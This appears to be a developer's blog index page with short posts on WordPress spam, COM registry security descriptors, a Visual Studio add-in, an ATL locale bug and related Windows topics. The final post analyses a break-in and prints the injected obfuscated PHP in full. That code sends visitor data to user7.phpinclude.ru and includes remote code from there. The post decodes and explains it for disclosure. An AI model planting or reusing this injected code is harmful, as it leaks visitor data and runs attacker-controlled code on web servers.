Fooling Around

// Oprogramowanie Roman Ryltsov

WordPress spam

Posted on by Roman

There has been a lot of and increasing comment spam on the blog engine and it finally reached a critical amount to put a stop instead of just trashing tens and then hundreds of comments. Before I already restricted comments to registered users only and it did not help much, then I disabled XML-RPC since it was second guess about spam source.

Then came a moment to sort things out and find that spam comes as pingbacks. However, the global option to disable pingbacks appeared to have no effect on existing content so spam kept coming in and the most recent hit is to take the database to phpMyAdmin and execute the following SQL statement:

UPDATE `wordpress_posts` SET `ping_status` = ‘closed’

to hopefully stop the dirt. Unfortunetely it’s clear it’s not the latest round of the resistance to spam as the bots would one day start registering as users…

Managing security desciptors in registry

Posted on by Roman

As it is well known, COM/DCOM per-class launch and access permissions are stored in registry under HKEY_CLASSES_ROOT\AppID key. However the permissions are stored in binary form (as a named REG_BINARY value) and thus not easy to read. DCOMCNFG (or MMC snap-in) is used to modify the values interactively but once one needs to update the values progammatically, he has to know the format.

The binary value is a self-relative security descriptor, written to registry as an array of bytes. ATL provides atlsecurity.h header file with handy security management classes including CSecurityDesc to handle security descriptors. Among the methods, there are FromString and ToString which perform conversion between binary format of a self-descriptive security descriptor and Security Descriptor String Format, which is a human friendly (more human friendly at least) representation of security descriptor. The conversion uses ConvertSecurityDescriptorToStringSecurityDescriptor and ConvertStringSecurityDescriptorToSecurityDescriptor API functions introduced with Windows 2000.

17-image001.png

Continue reading →

Build Incrementer Add-In for Visual Studio .NET (C++)

Posted on by Roman

This is a remake of a merely old thing coming since Visual C++ 6.0. The add-in updates .RC resource script to increment file version (A.B.C.D+1 from A.B.C.D) for a binary to be compiled just before compilation. This is useful to have each build compiled with a different version number.

The add-in works with C++ projects for Visual Studio .NET versions 2003, 2005, should also be working with 2002 version (no compiler by hand to make sure though).

08-image001.png

A known problem is that if resource script is edited from IDE, the pre-build update of the .RC file forces a popup message box confirming reload of .RC file by IDE. This might be somewhat annoying, however I have not find a way to silence the environment.
Continue reading →

ex-USSR software piracy

Posted on by Roman

Essence of respect to copyright in ex-USSR:

Поддерживать”отечественного” производителя, котрый не удосужился сделать русскогоязычный интерфейс?
Лично для меня “энгельский” не проблема. Так же как 990рублей (не хочу только геморроя с их отправкой автору ), но почему нет “великого и могучего”?
Я думаю, что автор несомненно неплохой програмы априори, “соотечественников” за покупателей (таргет групп) не считает. Пираты в Росси все. Если и купит один два – стОит ли ради них упираться…
А раз так, с чего это я его буду считать за “отечественного производителя “?

Any reason to waive an obligation to abide by copyrights will do…

Reusable AVI Resources

Posted on by Roman

While fixing Vista compatibility problems, an interesting issue arose with AVI clips. It is widely known that Windows shell animations are small AVI clips linked into shell32.dll binary as a resource of type “AVI”. Other DLLs have their clips too and standard animation common control is capable of picking the clips.

It is quite convenient to reuse shell32.dll animations in an action progress UI:

image001.png

However, it appeared that Vista’s shell32.dll comes with no more AVI clip at #170 resource in shell32.dll. So I needed a replacement and finally I made an application I have been needed since long ago: a batch grabber for AVI resources to see what AVIs come with clean OS.

Continue reading →

STRING resource problem/bug (SetThreadLocale, _CONVERSION_DONT_USE_THREAD_LOCALE)

Posted on by Roman

There has been an unexpected problem localizing application resources when STRING resources failed to load while there were no problems with other resource types. The source of the problem appears to be within ATL core. As long as CP_THREAD_ACP is involved in ATL’s conversion the loaded string is screwed.
The problem is illustrated by the sample. The same string resource is loaded with LoadString API and CString::LoadString ATL function. The difference is emphasized with bold below. As soon as Russian string is loaded from a thread with non-Russian thread locale, the string is screwed but only when loaded through ATL class (warning: Russian characters seems to be forged by WordPress in quoted text below):

C:\>ThreadLocaleSample01.exe
Default Thread Locale: 1033 (0x409), Primary Language 9 (0x9), SubLanguage 1 (0x1), Sort 0 (0x0)
String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
String 102: ????????????????????????????????
ATL String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
ATL String 102: ????????????????????????????????
Russian Locale: 1049 (0x419), Primary Language 25 (0x19), SubLanguage 1 (0x1), Sort 0 (0x0)
String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
String 102: ????????????????????????????????
ATL String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
ATL String 102: ????????????????????????????????
English Locale: 1033 (0x409), Primary Language 9 (0x9), SubLanguage 1 (0x1), Sort 0 (0x0)
String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
String 102: ????????????????????????????????
ATL String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
ATL String 102: ????????????????????????????????

Continue reading →

Hacked, user7.phpinclude.ru

Posted on by Roman

A while ago I found the website irresponsible while administrative dashboard remained worked fine. It appeared to be a problem with hosting or ISP from the start but later when the problem did not appear to be going to go, I decided to check if my theme files are writable by the web server… and I found the engine of the blog hacked and hacked exactly through mentioned loophole.

It is convenient to have theme files accessible for write through web server because it allows theme modification using dashboard but this is insecure and finally someone used this. The update of the theme files seems to be automated (batch operation) because file some whitespace and formatting was lost (this may be a consequence of modification through engine dashboard though) and < /html> tag was stripped from the templates.

The following code was inserted into PHP template immediately before the < /body> tag (inserted once per source code  file into last PHP < ? tag before the < /body > tag, to be exact):

error_reporting(0);
$a=(isset($_SERVER[“HTTP_HOST”]) ? $_SERVER[“HTTP_HOST”] : $HTTP_HOST);
$b=(isset($_SERVER[“SERVER_NAME”]) ? $_SERVER[“SERVER_NAME”] : $SERVER_NAME);
$c=(isset($_SERVER[“REQUEST_URI”]) ? $_SERVER[“REQUEST_URI”] : $REQUEST_URI);
$g=(isset($_SERVER[“HTTP_USER_AGENT”]) ? $_SERVER[“HTTP_USER_AGENT”] : $HTTP_USER_AGENT);
$h=(isset($_SERVER[“REMOTE_ADDR”]) ? $_SERVER[“REMOTE_ADDR”] : $REMOTE_ADDR);
$n=(isset($_SERVER[“HTTP_REFERER”]) ? $_SERVER[“HTTP_REFERER”] : $HTTP_REFERER);
$str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($g).”.”.base64_encode($h).”.”.base64_encode($n);
if((include_once(base64_decode(“aHR0cDovLw==”).base64_decode(“dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str))) { } else
{ include_once(base64_decode(“aHR0cDovLw==”).base64_decode(“dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str); }

What is this? “aHR0cDovLw==” means “http://”, “dXNlcjcucGhwaW5jbHVkZS5ydQ==” stands for “user7.phpinclude.ru” and thus server and visitor information was sent to remote hacker’s server http://user7.phpinclude.ru/? … I am using this opportunity to say “Hi” or “Preved”, whichever is more appropriate, to our new friends from Russia…By the way, Google knows a lot about these guys already.